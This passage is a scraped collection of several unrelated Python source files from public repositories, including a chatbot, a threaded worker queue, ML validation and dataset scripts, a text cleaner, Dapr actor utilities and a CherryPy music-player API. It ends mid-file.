open('responses.txt', 'w')\n\tnew_file.write(z)\n\tnew_file.close()\n\ndef make_dictionary():\n\tf = open('responses.txt', 'r+')\n\tx = f.read()\n\treturn ast.literal_eval(x)\n\ndef make_unresponded_list():\n\tf = open('unresponded.txt', 'r+')\n\tx = f.read()\n\treturn ast.literal_eval(x)\n\ndef make_alternate_dictionary():\n\tf = open('alternate.txt', 'r+')\n\tx = f.read()\n\treturn ast.literal_eval(x)\n\ndef make_alternate_list():\n\tf = open('unresponded_alternate.txt', 'r+')\n\tx = f.read()\n\treturn ast.literal_eval(x)\n\ndef find_response(key):\n\tdictionary = make_dictionary()\n\tif key in dictionary:\n\t\treturn pick_from_responses(dictionary[key])\n\tadd_to_unresponded(key)\n\treturn None\n\ndef pick_from_responses(l):\n\tif type(l) == list:\n\t\tlength = len(l)\n\t\tindex = random.randint(0,length-1)\n\t\treturn l[index]\n\ndef add_to_unresponded(key):\n\tf = open('unresponded.txt', 'r+')\n\tx = f.read()\n\tl = ast.literal_eval(x)\n\tif key not in l:\n\t\tl.append(key)\n\tl = str(l)\n\tnew_file = open('unresponded.txt', 'w')\n\tnew_file.write(l)\n\tnew_file.close()\n\ndef remove_from_unresponded(key):\n\tf = open('unresponded.txt', 'r+')\n\tx = f.read()\n\tl = ast.literal_eval(x)\n\tif key in l:\n\t\tl.remove(key)\n\tl = str(l)\n\tnew_file = open('unresponded.txt', 'w')\n\tnew_file.write(l)\n\tnew_file.close()\n\ndef take_input(key, user):\n\tresponse = Response(key, 'user')\n\tif user in conversation:\n\t\tconversation[user].append(response)\n\telse:\n\t\tconversation[user] = []\n\t\tconversation[user].append(response)\n\tif key in make_alternate_dictionary():\n\t\tres = make_alternate_response(key)\n\telse:\n\t\tres = find_response(key)\n\tif res == None:\n\t\tres = \"Sorry, we don't have a response for that yet\"\n\tresponse = Response(res, 'chatbot')\n\tconversation[user].append(response)\t\n\treturn res\n\ndef clear_conversation(user):\n\tconversation[user] = []\n\ndef add_to_unresponded_alternate(message):\n\tf = open('unresponded_alternate.txt', 'r+')\n\tx = f.read()\n\tl = ast.literal_eval(x)\n\tif message not in l:\n\t\tl.append(str(message))\n\tl = str(l)\n\tnew_file = open('unresponded_alternate.txt', 'w')\n\tnew_file.write(l)\n\tnew_file.close()\n\ndef remove_from_unresponded_alternate(message):\n\tf = open('unresponded_alternate.txt', 'r+')\n\tx = f.read()\n\tl = ast.literal_eval(x)\n\tif message in l:\n\t\tl.remove(message)\n\tl = str(l)\n\tnew_file = open('unresponded_alternate.txt', 'w')\n\tnew_file.write(l)\n\tnew_file.close()\n\ndef make_alternate_response(key):\n\td = make_alternate_dictionary()\n\tif key not in d:\n\t\treturn None\n\tfunction = d[key]\n\tif function == 'something':\n\t\treturn something()\n\ndef add_alternate_function(key, function):\n\tf = open('alternate.txt', 'r+')\n\tx = f.read()\n\td = ast.literal_eval(x)\n\tif key not in d:\n\t\td[key] = function\n\td = str(d)\n\tnew_file = open('alternate.txt', 'w')\n\tnew_file.write(d)\n\tnew_file.close()\n\tremove_from_unresponded_alternate(key)\n\nclass Response:\n\tdef __init__(self, text, speaker):\n\t\tself.text = text\n\t\tself.speaker = speaker\n\ndef something():\n\treturn 'hello again'\n\nif __name__ == '__main__':\n\tadd_alternate_function('something', 'something')\n\tapp.run()","repo_name":"panyang/chatbot-1","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":5689,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"8"} +{"seq_id":"43042560244","text":"#!/usr/bin/python3\n\nfrom queue import Queue\nfrom threading import Thread\n\nclass ClosableQueue(Queue):\n SENTINEL = object()\n\n def close(self):\n self.put(self.SENTINEL)\n\n def __iter__(self):\n while True:\n item = self.get()\n try:\n if item is self.SENTINEL:\n return # Cause the thread to exit\n yield item\n finally:\n self.task_done()\n\n\nclass Worker(Thread):\n def __init__(self, func, in_queue, out_queue):\n super().__init__()\n self.func = func\n self.in_queue = in_queue\n self.out_queue = out_queue\n self.polled_count = 0\n self.work_done = 0\n\n def run(self):\n for item in self.in_queue:\n result = self.func(item)\n self.out_queue.put(result)\n","repo_name":"Jasper-Li/utils","sub_path":"multiThread/Worker.py","file_name":"Worker.py","file_ext":"py","file_size_in_byte":832,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"8"} +{"seq_id":"26667561942","text":"import config\nimport torch\nfrom utils import print_metrics\ndevice = config.device\n\ndef loss_fun(outputs, targets):\n return torch.nn.BCEWithLogitsLoss()(outputs, targets)\n\n# function to validate the validation data from trained model\ndef validate(model, testLoader):\n model.eval()\n val_targets = []\n val_outputs = []\n with torch.no_grad():\n for _, data in enumerate(testLoader):\n ids = data['ids'].to(device, dtype=torch.long)\n mask = data['mask'].to(device, dtype=torch.long)\n token_type_ids = data['token_type_ids'].to(device, dtype=torch.long)\n targets = data['targets'].to(device, dtype=torch.float)\n outputs = model(ids, mask, token_type_ids)\n loss = loss_fun(outputs, targets)\n epoch_loss = loss.item()\n val_targets.extend(targets.cpu().detach().numpy().tolist())\n val_outputs.extend(torch.sigmoid(outputs).cpu().detach().numpy().tolist())\n\n return print_metrics(val_targets,val_outputs, epoch_loss,'Validation')","repo_name":"skshashankkumar41/Subtheme-Sentiments","sub_path":"validate.py","file_name":"validate.py","file_ext":"py","file_size_in_byte":1045,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"8"} +{"seq_id":"31760966653","text":"import pickle\nimport helpers\nfrom glob import glob\nfrom matplotlib import pyplot as plt\nimport cv2\nimport random\nimport numpy as np\nfrom numpy.linalg import inv\n\n# hyperparameters\nrho = 32\npatch_size = 128\nheight = 240\nwidth = 320\nvisualize = False\nnum_examples = 1000\n\nloc_list = glob(\"./ms_coco_test_images/*.jpg\")\nX = np.zeros((128, 128, 2, num_examples)) # images\nY = np.zeros((4, 2, num_examples))\nfor i in range(num_examples):\n if i % 100 == 0:\n print(\"Created \", i, \" examples.\")\n # select random image from tiny training set\n index = random.randint(0, 9)\n img_file_location = loc_list[index]\n color_image = plt.imread(img_file_location)\n color_image = cv2.resize(color_image, (width, height))\n gray_image = cv2.cvtColor(color_image, cv2.COLOR_RGB2GRAY)\n\n # create random point P within appropriate bounds\n y = random.randint(rho, height - rho - patch_size) # row?\n x = random.randint(rho, width - rho - patch_size) # col?\n # define corners of image patch\n top_left_point = (x, y)\n bottom_left_point = (patch_size + x, y)\n bottom_right_point = (patch_size + x, patch_size + y)\n top_right_point = (x, patch_size + y)\n four_points = [top_left_point, bottom_left_point, bottom_right_point, top_right_point]\n perturbed_four_points = []\n for point in four_points:\n perturbed_four_points.append((point[0] + random.randint(-rho, rho), point[1] + random.randint(-rho, rho)))\n\n # compute H\n H = cv2.getPerspectiveTransform(np.float32(four_points), np.float32(perturbed_four_points))\n H_inverse = inv(H)\n inv_warped_image = cv2.warpPerspective(gray_image, H_inverse, (320, 240))\n warped_image = cv2.warpPerspective(gray_image, H, (320, 240))\n\n # grab image patches\n original_patch = gray_image[y:y + patch_size, x:x + patch_size]\n warped_patch = inv_warped_image[y:y + patch_size, x:x + patch_size]\n # make into dataset\n training_image = np.dstack((original_patch, warped_patch))\n H_four_points = np.subtract(np.array(perturbed_four_points), np.array(four_points))\n X[:, :, :, i] = training_image\n Y[:, :, i] = H_four_points\n\n if visualize:\n plt.figure(figsize=(40, 20))\n # visualize patches on color image\n patches_visualization = color_image.copy()\n cv2.polylines(patches_visualization, np.int32([perturbed_four_points]), 1, (0, 0, 255))\n cv2.polylines(patches_visualization, np.int32([four_points]), 1, (255, 0, 0))\n helpers.show_image((2, 2, 1), \"ORIGINAL IMAGE\", patches_visualization)\n # visualize patch on warped image\n patch_warped_visualization = inv_warped_image.copy()\n cv2.polylines(patch_warped_visualization, np.int32([four_points]), 1, (0, 0, 0))\n helpers.show_image((2, 2, 2), \"WARPED IMAGE\", patch_warped_visualization)\n # visualize patch itself\n helpers.show_image((2, 2, 3), \"ORIGINAL PATCH\", original_patch)\n # visualize warped patch itself\n helpers.show_image((2, 2, 4), \"WARPED PATCH\", warped_patch)\n plt.show()\n plt.close()\nprint(\"Saving in pickle format.\")\nX_train = X[0:int(0.9 * num_examples)]\nX_valid = X[int(0.9 * num_examples):]\nY_train = Y[0:int(0.9 * num_examples)]\nY_valid = Y[int(0.9 * num_examples):]\ntrain = {'features': X_train, 'labels': Y_train}\nvalid = {'features': X_valid, 'labels': Y_valid}\npickle.dump(train, open(\"train.p\", \"wb\"))\npickle.dump(valid, open(\"valid.p\", \"wb\"))\nprint(\"Done.\")\n","repo_name":"alexhagiopol/deep_homography_estimation","sub_path":"generate_dataset.py","file_name":"generate_dataset.py","file_ext":"py","file_size_in_byte":3454,"program_lang":"python","lang":"en","doc_type":"code","stars":43,"dataset":"github-code","pt":"8"} +{"seq_id":"43427224867","text":"import inflect\nimport re\nimport unidecode\nimport json\nimport string\n\np = inflect.engine()\n\n\ndef printable_only(text: str) -> str:\n \"\"\"_Removes crap characters that don't play nicely with things like TTS processors._\n\n Args:\n text (str): _Takes a string that needs to be cleaned._\n\n Returns:\n str: _Returns only printable characters in the form of a string after creating an iterable that is then rejoined after filtering._\n \"\"\"\n printable = set(string.printable)\n return \"\".join(filter(lambda x: x in printable, text))\n\n\ndef raw_list_from_file(text_path: str) -> list:\n \"\"\"Pulls text from a file and returns it as a list.\n\n Args:\n text_path (str): The path of the text file.\n\n Returns:\n list: A list of lines to be cleaned.\n \"\"\"\n line_list = []\n\n with open(text_path, \"r\", encoding=\"utf-8\") as f:\n for line in f:\n line_list.append(line)\n\n return line_list\n\n\ndef clean_years_l(line_list: list, inf_eng: inflect.engine) -> list:\n \"\"\"Transforms all years from numberals to words.\n\n Args:\n line_list (list): _description_\n inf_eng (inflect.engine): _description_\n\n Returns:\n list: Returns a cleaned list of the line_list argument.\n \"\"\"\n for idx, line in enumerate(line_list):\n results = re.findall(\"(\\D)(\\d{4})(\\D)\", line)\n for result in results:\n year_change = re.sub(\n \"-oh-oh\",\n \"-hundred\",\n re.sub(\n \"oh\\s\",\n \"oh-\",\n re.sub(\n \",\\s\", \"-\", p.number_to_words(result[1], group=2, zero=\"oh\")\n ),\n ),\n )\n single_years = [\n \"one\",\n \"two\",\n \"three\",\n \"four\",\n \"five\",\n \"six\",\n \"seven\",\n \"eight\",\n \"nine\",\n ]\n for year in single_years:\n if year_change[:6] == \"twenty\":\n year_change = re.sub(\n f\"twenty-oh-{year}\", f\"two-thousand-and-{year}\", year_change\n )\n else:\n year_change = re.sub(\n f\"oh-{year}\", f\"hundred-and-{year}\", year_change\n )\n line_list[idx] = re.sub(result[1], year_change, line_list[idx])\n return line_list\n\n\ndef clean_numbers_l(line_list: list, inf_eng: inflect.engine) -> list:\n \"\"\"Turns all non-year numbers into words.\n\n Args:\n line_list (list): _description_\n inf_eng (inflect.engine): _description_\n\n Returns:\n list: _Returns a cleaned list of the line_list argument._\n \"\"\"\n\n for idx, line in enumerate(line_list):\n result = re.findall(\"(\\d+)\", line)\n for found_num in result:\n l_found_num = list(found_num)\n l_found_num[0] = inf_eng.number_to_words(l_found_num, andword=\" and\")\n found_num = tuple(l_found_num)\n repl = f\"{found_num[0]}\"\n updated_line = re.sub(\"\\d+\", repl, line)\n line_list[idx] = unidecode.unidecode(updated_line)\n return line_list\n\n\ndef to_file(text_list: list, dest_path: str) -> None:\n \"\"\"\n Writes the cleaned text to a file.\n \"\"\"\n with open(dest_path, \"w+\", encoding=\"utf-8\") as f:\n for line in text_list:\n f.write(line)\n\n\ndef to_json(text_list: list, dest_path: str) -> None:\n \"\"\"\n Writes the cleaned text to a json file.\n \"\"\"\n\n list_container = {\"text_list\": []}\n\n for line in text_list:\n list_container[\"test_list\"].append(line)\n\n with open(dest_path, \"w+\", encoding=\"utf-8\") as f:\n json.dump(list_container, f, indent=4)\n\ndef clean_titles(text_list:list)->list:\n title_list = []\n title_clean_top = 0\n title_clean_mid = 0\n for idx, line in enumerate(text_list):\n if line.isupper():\n title_list.append(line)\n if len(title_list) == 2:\n title_clean_mid = idx\n title_clean_top = idx-2\n if len(title_list) == 3:\n text_list[idx] = \" \".join(title_list)\n title_list = []\n text_list.remove(text_list[title_clean_mid])\n text_list.remove(text_list[title_clean_top])\n return text_list\n\ndef last_pass(text_list: str, dest_path: str) -> None:\n \"\"\"_Cleans the text_list argument of unprintable and unwanted characters then writes it to a file._\n\n Args:\n text_list (str): _The list of text lines to be cleaned_\n dest_path (str): _The path of the output file including the file name and extension._\n \"\"\"\n final_lines = []\n for line in text_list:\n line = re.sub(\"\\s+\", \" \", line)\n line = re.sub(\"\\n\", \"\", line)\n line = re.sub(\"\\r\", \"\", line)\n line = re.sub(\"\\t\", \"\", line)\n line = \"\".join([line, \"\\n\"])\n final_lines.append(printable_only(line))\n to_file(final_lines, dest_path)\n\n\nif __name__ == \"__main__\":\n\n def main(text_path: str, dest_path: str, inf_eng: inflect.engine):\n \"\"\"_Cleans the text_path argument and writes it to a file._\"\"\"\n last_pass(\n clean_titles(\n clean_numbers_l(\n clean_years_l(raw_list_from_file(text_path), inf_eng), inf_eng\n ),\n ),\n dest_path,\n )\n\n main(\"text_files/origin_text.txt\", \"text_files/clean.txt\", p)\n","repo_name":"TheLustriVA/ttsMetaClean","sub_path":"clean.py","file_name":"clean.py","file_ext":"py","file_size_in_byte":5514,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"8"} +{"seq_id":"36597775025","text":"#!/usr/bin/python\n # -*- coding: utf-8 -*-\n\n\nimport pandas as pd\nimport numpy as np\nimport pickle\n\n\ndef clean_json(df):\n \"\"\" Summary: Take in a pandas DataFrame from json and prepare it for mod el prediction.\n INPUT: Pandas DataFrame: DataFrame of imported json.\n OUTPUT: Pandas DataFrame: DataFrame after it has been prepared for t he model.\n \"\"\"\n\n df.drop('description', inplace=True, axis=1)\n\n # Fraud defined as anything that isn't premium\n #df['fraud'] = np.where(df.acct_type == \"premium\", False, True)\n\n # Strip out the value after the final period\n df['email_domain_ending'] = df['email_domain'].apply(lambda x: x.split('.')[-1].lower().strip() )\n\n # Required step: clean domain ending for future data\n #temp = pd.crosstab(df['email_domain_ending'], df['fraud'])\n\n #temp.rename(columns={False:\"FALSE\", True:\"TRUE\"}, inplace=True)\n temp = df.copy(deep=True)\n if \"TRUE\" not in temp.columns:\n temp[\"TRUE\"] = 0\n if \"FALSE\" not in temp.columns:\n temp[\"FALSE\"] = 0\n temp.reset_index(inplace=True)\n temp['email_domain_ending'] = np.where(temp[\"FALSE\"] + temp[\"TRUE\"] <= 10, 'other', temp.email_domain_ending)\n acceptable_domain_endings = set(temp['email_domain_ending'])\n\n df['email_domain_ending'] = df['email_domain_ending'].apply(lambda x: x if x in acceptable_domain_endings else \"other\")\n\n # Whether or not the user input a venue_name\n df['has_venue'] = np.where(pd.isnull(df.venue_name), False, True)\n\n # Remove unused columns\n df = df[['body_length', 'email_domain_ending', 'user_age', 'has_venue']]\n\n # Create dummies for email_domain_ending\n df_domain = pd.get_dummies(df['email_domain_ending'])\n frames = [df, df_domain]\n df = pd.concat(frames, axis=1)\n df = df.drop('email_domain_ending', axis=1)\n\n # Ensure the columns match those the model expects.\n # This is primarily for dummies not being present. \n cols = pickle.load(open(\"models/model_columns.pkl\"))\n for col in cols[cols != 'fraud']:\n if col not in df.columns:\n df[col] = 0\n\n return df\n\n\ndef get_json(json_path = \"test_script_examples.json\"):\n \"\"\" Summary: Read in json file with test examples to predict.\"\n INPUT: string: Path to json file to read in.\n OUTPUT: Pandas DataFrame: DataFrame of the raw json.\n \"\"\"\n\n return pd.read_json(json_path)\n\n\ndef get_model(model_path = \"models/model.pkl\"):\n \"\"\" Summary: Load a pickled sklearn model.\n INPUT: string: Path to pickled model.\n OUTPUT: Sklearn Model: Model we will use for prediction.\n \"\"\"\n return pickle.load(open(model_path))\n\n\ndef get_predictions(df, model):\n \"\"\" Summary: Produce predictions with probabilties of each label.\n INPUT: Pandas DataFrame: DataFrame of prepared test examples to evaluate.\n Sklearn model: Model to perform predictions.\n OUTPUT: Predicted probabilties of each class for each example read. \n \"\"\"\n return model.predict_proba(df)\n\n\n\nif __name__ == \"__main__\":\n test_df = get_json()\n test_df = clean_json(test_df)\n #model = get_model()\n #predictions = get_predictions(test_df, model)\n #print predictions\n\n","repo_name":"clemriedel/ds4all","sub_path":"pipeline/predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":3214,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"8"} +{"seq_id":"22021044317","text":"from typing import Any, Dict, List, Type\n\nfrom dapr.actor.actor_interface import ActorInterface\nfrom dapr.actor.runtime.actor import Actor\n\n\ndef get_class_method_args(func: Any) -> List[str]:\n args = func.__code__.co_varnames[:func.__code__.co_argcount]\n\n # Exclude self, cls arguments\n if args[0] == 'self' or args[0] == 'cls':\n args = args[1:]\n return list(args)\n\n\ndef get_method_arg_types(func: Any) -> List[Type]:\n annotations = getattr(func, '__annotations__')\n args = get_class_method_args(func)\n arg_types = []\n for arg_name in args:\n arg_type = object if arg_name not in annotations else annotations[arg_name]\n arg_types.append(arg_type)\n return arg_types\n\n\ndef get_method_return_types(func: Any) -> Type:\n annotations = getattr(func, '__annotations__')\n if len(annotations) == 0 or not annotations['return']:\n return object\n return annotations['return']\n\n\ndef get_dispatchable_attrs_from_interface(\n actor_interface: Type[ActorInterface],\n dispatch_map: Dict[str, Any]) -> None:\n for attr, v in actor_interface.__dict__.items():\n if attr.startswith('_') or not callable(v):\n continue\n actor_method_name = getattr(v, '__actormethod__') if hasattr(v, '__actormethod__') else attr\n\n dispatch_map[actor_method_name] = {\n 'actor_method': actor_method_name,\n 'method_name': attr,\n 'arg_names': get_class_method_args(v),\n 'arg_types': get_method_arg_types(v),\n 'return_types': get_method_return_types(v)\n }\n\n\ndef get_dispatchable_attrs(actor_class: Type[Actor]) -> Dict[str, Any]:\n \"\"\"Gets the list of dispatchable attributes from actor.\n\n Args:\n actor_class (type): The actor object which inherits :class:`ActorInterface`\n\n Returns:\n Dict[str, Any]: The map from attribute to actor method.\n\n Raises:\n ValueError: `actor_class` doesn't inherit :class:`ActorInterface`.\n \"\"\"\n # Find all user actor interfaces derived from ActorInterface\n actor_interfaces = get_actor_interfaces(actor_class)\n if len(actor_interfaces) == 0:\n raise ValueError(f'{actor_class.__name__} has not inherited from ActorInterface')\n\n # Find all dispatchable attributes\n dispatch_map: Dict[str, Any] = {}\n for user_actor_cls in actor_interfaces:\n get_dispatchable_attrs_from_interface(user_actor_cls, dispatch_map)\n\n return dispatch_map\n\n\ndef is_dapr_actor(cls: Type[Actor]) -> bool:\n \"\"\"Checks if class inherits :class:`Actor`.\n\n Args:\n cls (type): The Actor implementation.\n\n Returns:\n bool: True if cls inherits :class:`Actor`. Otherwise, False\n \"\"\"\n return issubclass(cls, Actor)\n\n\ndef get_actor_interfaces(cls: Type[Actor]) -> List[Type[ActorInterface]]:\n \"\"\"Gets the list of the base classes that inherits :class:`ActorInterface`.\n\n Args:\n cls (:class:`Actor`): The Actor object that inherit :class:`Actor` and\n :class:`ActorInterfaces`.\n\n Returns:\n List: the list of classes that inherit :class:`ActorInterface`.\n \"\"\"\n actor_bases = []\n for cl in cls.mro():\n if ActorInterface in cl.__bases__:\n actor_bases.append(cl)\n\n return actor_bases\n","repo_name":"dapr/python-sdk","sub_path":"dapr/actor/runtime/_type_utils.py","file_name":"_type_utils.py","file_ext":"py","file_size_in_byte":3259,"program_lang":"python","lang":"en","doc_type":"code","stars":188,"dataset":"github-code","pt":"8"} +{"seq_id":"25646526617","text":"#!/usr/bin/env python3\n\nfrom __future__ import unicode_literals\n\nimport cherrypy\nimport os\nimport threading\nimport glob\nimport zipfile\nimport shutil\nimport pymongo as pm\nimport functools\nimport time\n\nfrom bson.objectid import ObjectId\nfrom io import BytesIO\nfrom uuid import uuid4\n\nimport music_player.utils as m_utils\n\nfrom datetime import datetime, timedelta\n\nimport youtube_dl\nimport eyed3\n\nfrom http import cookiejar\nimport requests\nfrom selectolax.parser import HTMLParser\n#from stackoverflow.com/questions/17037668/how-to-disable-cookie-handling-with-the-python-requests-library\nclass BlockAll(cookiejar.CookiePolicy):\n\treturn_ok = set_ok = domain_return_ok = path_return_ok = lambda self, *args, **kwargs: False\n\tnetscape = True\n\trfc2965 = hide_cookie2 = False\n\nabsDir = os.getcwd()\nplaylistFields = [\"_id\", \"date\", \"dateStr\", \"contents\", \"name\"]\nmusicFields = [\"_id\", \"url\", \"type\", \"vol\", \"name\", \"artist\", \"start\", \"end\"]\n\nDOWNLOAD_FOLDER = \"download\"\ndownloadThreads = {}\navgDelay = 75\t\t\t\t\t#expect about 75 ms to execute per second of the video\nalpha = 0.5\t\t\t\t\t\t#alpha for exponential moving average; closer to 1 means recent observations have more weight\nnetworkDelay = 500\t\t\t\t#expect 500ms between client and server\ndownloadUIDFolders = {}\t\t\t#holds UID: time served\ndownloadCleanupDelay = 5 * 60\t#wait 5 minutes before attempting to cleanup\n\n# interrupted = False\n# def signal_handler(signal, frame):\n# \tglobal interrupted\n# \tinterrupted = True\n# import signal\n# signal.signal(signal.SIGINT, signal_handler)\n\nimport signal\n\nexit = threading.Event()\ndef quit(signo, _frame):\n\tprint(\"Interrupt caught, shutting down\")\n\texit.set()\n\tcherrypy.engine.exit()\n\nfor sig in (\"TERM\", \"HUP\", \"INT\"):\n\tsignal.signal(getattr(signal, \"SIG\" + sig), quit)\n\ndef authUser(func):\n\t'''\n\tVerify user is logged in; redirect if not\n\t'''\n\t@functools.wraps(func)\n\tdef decorated_function(*args, **kwargs):\n\t\tuser = cherrypy.session.get('name', None)\n\n\t\t# no user means force a login\n\t\tif user is None:\n\t\t\t# raise cherrypy.HTTPRedirect('/login')\n\t\t\t# raise cherrypy.HTTPRedirect('/')\n\t\t\traise cherrypy.HTTPError(403, \"Not logged in\")\n\t\treturn func(*args, **kwargs)\n\n\treturn decorated_function\n\n\t# return decorator\n\nclass ApiGateway(object):\n\n\tdef __init__(self):\n\t\tclient = pm.MongoClient()\n\t\tself.db = client['music']\n\t\t# self.colArtist = db[\"artists\"]\t#this will be shared across users; same with genres: albums will be personal\n\t\t# self.colMusic = db['music']\n\t\t# self.colPlaylists = db['playlists']\n\t\tself.colUsers = self.db['users']\n\t\tself.colLast = self.db[\"lastPlay\"]\n\t\t# cleanupDownloadThread = threading.Thread(target=self.cleanupDownloads)\n\t\t# cleanupDownloadThread.start()\n\n\t@authUser\n\tdef getUser(self):\n\t\treturn cherrypy.session.get(\"name\")\n\n\t@authUser\n\tdef musicDB(self):\n\t\t# user = cherrypy.session.get(\"name\")\n\t\treturn self.db[self.getUser() + \"-music\"]\n\n\t@authUser\n\tdef playlistDB(self):\n\t\t# user = cherrypy.session.get(\"name\")\n\t\treturn self.db[self.getUser() + \"-playlist\"]\n\n\t# @authUser\n\t# def lastDB(self):\n\t# \t# user = cherrypy.session.get(\"name\")\n\t# \treturn self.db[self.getUser() + \"-last\"]\n\n\t# API Functions go below. DO EXPOSE THESE\n\n\t@cherrypy.expose\n\t@cherrypy.tools.json_in()\n\tdef doLogin(self):\n\t\t\"\"\"\n\t\tLogs the user into the system\n\n\t\tExpected input:\n\n\t\t\t{\n\t\t\t\t\"username\": (string),\n\t\t\t\t\"password\": (string)\n\t\t\t}\n\t\t\"\"\"\n\t\tif hasattr(cherrypy.request, \"json\"):\n\t\t\tdata = cherrypy.request.json\n\t\telse:\n\t\t\traise cherrypy.HTTPError(400, \"No data was given\")\n\n\t\tfor k in [\"username\", \"password\"]:\n\t\t\tm_utils.checkValidData(k, data, str)\n\t\tuser = self.colUsers.find_one({\"username\": data[\"username\"]})\n\t\tif user is not None and m_utils.verifyUser(user, data[\"password\"]):\n\t\t\t#set the session name\n\t\t\tcherrypy.session[\"name\"] = data[\"username\"]\n\t\t\treturn\n\t\telse:\n\t\t\traise cherrypy.HTTPError(403, \"Invalid login credentials\")\n\n\t@cherrypy.expose\n\t@cherrypy.tools.json_in()\n\tdef changePassword(self):\n\t\t\"\"\"\n\t\tChanges the password for a user\n\n\t\tExpected input:\n\n\t\t\t{\n\t\t\t\t\"username\": (string),\n\t\t\t\t\"old\": (string),\n\t\t\t\t\"new\": (string)\n\t\t\t}\n\t\t\"\"\"\n\t\tif hasattr(cherrypy.request, \"json\"):\n\t\t\tdata = cherrypy.request.json\n\t\telse:\n\t\t\traise cherrypy.HTTPError(400, \"No data was given\")\n\n\t\tfor k in [\"username\", \"old\", \"new\"]:\n\t\t\tm_utils.checkValidData(k, data, str)\n\t\tuser = self.colUsers.find_one({\"username\": data[\"username\"]})\n\t\tif user is not None:\n\t\t\tnewHash, newSalt = m_utils.changePassword(user, data[\"old\"], data[\"new\"])\n\t\t\tself.colUsers.update_one({\"username\": data[\"username\"]}, {\"$set\": {\"hash\": newHash, \"salt\": newSalt}})\n\t\t\treturn\n\t\telse:\n\t\t\traise cherrypy.HTTPError(403, \"Invalid login credentials\")\n\n\t@cherrypy.expose\n\t@authUser\n\tdef logout(self):\n\t\t\"\"\"\n\t\tLogs user out of system\n\t\t\"\"\"\n\t\tprint(\"LOGGING OUT\");\n\t\tcherrypy.lib.sessions.expire()\n\n\t@cherrypy.expose\n\t@cherrypy.tools.json_in()\n\t@cherrypy.tools.json_out()\n\t@authUser\n\tdef addMusic(self):\n\t\t\"\"\"\n\t\tAdd a song to the database\n\n\t\tExpected input:\n\n\t\t\t{\n\t\t\t\t\"url\": (string),\n\t\t\t\t\"type\": (string) (\"youtube\" or \"mp3\"),\t//TODO: add other sources\n\t\t\t\t\"vol\": (int) (0-100),\n\t\t\t\t\"name\": (string),\n\t\t\t\t\"artist\": [(string)],\n\t\t\t\t\"album\": (string),\n\t\t\t\t\"genre\": (string),\n\t\t\t\t\"start\": (int) (in seconds),\n\t\t\t\t\"end\": (int) (number of seconds from the end of video to stop)\n\t\t\t}\n\n\t\tReturns::\n\n\t\t\tAdded MongoDB object\n\n\t\t:return: the MongoDB object\n\t\t\"\"\"\n\t\t# check that we actually have json\n\t\tif hasattr(cherrypy.request, 'json'):\n\t\t\tdata = cherrypy.request.json\n\t\telse:\n\t\t\traise cherrypy.HTTPError(400, 'No data was given')\n\n\t\t# sanitize the input\n\t\tmyRequest = m_utils.createMusic(data, self.musicDB())\n\t\tmyRequest[\"date\"] = datetime.now()\n\n\t\t# insert the data into the database\n\t\tinserted = self.musicDB().insert(myRequest)\n\n\t\t#TODO: check if the artist exists; add if DNE\n\t\t# for artist in myRequest[\"artist\"]:\n\t\t# \tif (len(list(self.colArtist.find({\"name\": artist}).limit(1))) == 0):\n\t\t# \t\tself.colArtist.insert_one({\"name\": artist})\n\n\t\tmyRequest[\"_id\"] = str(inserted)\n\t\treturn m_utils.cleanRet(myRequest)\n\n\t@cherrypy.expose\n\t@cherrypy.tools.json_in()\n\t@cherrypy.tools.json_out()\n\t@authUser\n\tdef addManyMusic(self):\n\t\t\"\"\"\n\t\tAdd many songs to the database\n\n\t\tExpected input:\n\n\t\t\t[{\n\t\t\t\t\"url\": (string),\n\t\t\t\t\"type\": (string) (\"youtube\" or \"mp3\"),\t//TODO: add other sources\n\t\t\t\t\"vol\": (int) (0-100),\n\t\t\t\t\"name\": (string),\n\t\t\t\t\"artist\": [(string)],\n\t\t\t\t\"album\": (string),\n\t\t\t\t\"genre\": (string),\n\t\t\t\t\"start\": (int) (in seconds),\n\t\t\t\t\"end\": (int) (number of seconds from the end of video to stop)\n\t\t\t},\n\t\t\t...]\n\n\t\tReturns::\n\n\t\t\t[{}, ...]\n\n\t\t:return: a list containing the inserted objects\n\t\t\"\"\"\n\t\t# check that we actually have json\n\t\tif hasattr(cherrypy.request, 'json'):\n\t\t\tdata = cherrypy.request.json\n\t\telse:\n\t\t\traise cherrypy.HTTPError(400, 'No data was given')\n\n\t\t# sanitize the input\n\t\tmyRequest = [];\n\t\tif not isinstance(data, list) or len(data) == 0:\n\t\t\traise cherrypy.HTTPError(400, \"Invalid data given\")\n\t\tfor song in data:\n\t\t\tif not isinstance(song, dict):\n\t\t\t\traise cherrypy.HTTPError(400, \"Invalid song data given\")\n\t\t\treqSong = m_utils.createMusic(song, self.musicDB())\n\t\t\treqSong[\"date\"] = datetime.now()\n\n\t\t\t# insert the data into the database\n\t\t\tmyRequest.append(reqSong)\n\t\t\t# print(reqSong)\n\n\t\t\t#TODO: check if the artist exists; add if DNE\n\t\t\t# for artist in reqSong[\"artist\"]:\n\t\t\t# \tif (len(list(self.colArtist.find({\"name\": artist}).limit(1))) == 0):\n\t\t\t# \t\tself.colArtist.insert_one({\"name\": artist})\n\n\t\t\t# reqSong[\"_id\"] = str(inserted)\n\t\t# return m_utils.cleanRet(myRequest)\n\t\tinserted = self.musicDB().insert_many(myRequest)\t#this is ordered by default\n\t\tfor i, song in enumerate(myRequest):\n\t\t\tmyRequest[i][\"_id\"] = inserted.inserted_ids[i]\n\t\t# print(myRequest)\n\t\treturn m_utils.cleanRet(myRequest)\n\n\t@cherrypy.expose\n\t@cherrypy.tools.json_in()\n\t@cherrypy.tools.json_out()\n\t@authUser\n\tdef findMusic(self):\n\t\t\"\"\"\n\t\tReturns a list of songs matching the query presented; limits to 25\n\n\t\tExpected input (no field present -> return all):\n\t\t\t{\n\t\t\t\t\"url\": [(string)],\n\t\t\t\t\"type\": [(string)],\n\t\t\t\t\"song_names\": [(string)],\n\t\t\t\t\"artist_names\": [(string)],\n\t\t\t\t\"album_names\": [(string)],\n\t\t\t\t\"genre_names\": [(string)],\n\t\t\t\t\"start_date\": (datetime),\n\t\t\t\t\"end_date\": (datetime),\n\t\t\t\t\"_id\": 